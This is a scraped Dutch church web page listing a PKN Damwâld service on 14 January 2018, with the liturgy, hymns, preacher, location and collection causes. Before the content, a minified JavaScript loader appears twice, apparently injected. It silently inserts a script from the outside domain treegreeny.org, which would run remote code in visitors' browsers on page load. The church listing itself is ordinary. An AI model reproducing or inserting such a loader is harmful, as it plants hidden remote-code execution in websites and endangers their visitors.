;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 14 januari 2018 9:30 uur - PKN Damwâld
zondag 14 januari 2018
09:30 uur

Kerkdienst zondag 14 januari 2018 9:30 uur

Thema: Voorbereiding Heilig Avondmaal

Informatie

Voorganger:Dhr. J.Y. van der Wal, Morra
Organist:Nienke van der Heide-Visser
Thema:Voorbereiding Heilig Avondmaal
Liturgie
Lied voor de dienst Elb 351
Welkom en mededelingen
Lied van intocht Psalm 63 vers 1, 2
Stil gebed , Woord van verwachting en Groet
We zingen: Psalm 63 vers 3
Gebed
Lezing van het formulier voor de viering van het Heilig Avondmaal .
We zingen: Gezang 409 vers 1, 4
We lezen: Lukas 15 : 21-28
We zingen: Psalm 116 vers 1, 2 en 3
Verkondiging .
We zingen: Psalm 116 vers 6 en 8
Dank- en voorbeden
Collecte
Slotlied Gezang 358 vers 1, 2, 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Tear

Tear financiert projecten op het gebied van noodhulp en ontwikkeling in Afrika, Azië en Latijns-Amerika, verbindt kerken in Nederland met kerken in ontwikkelingslanden, en voert campagnes in Nederland om bewustwording rond gerechtigheid te realiseren.

Tweede collecte: Kerk
Uitganscollecte: Kerk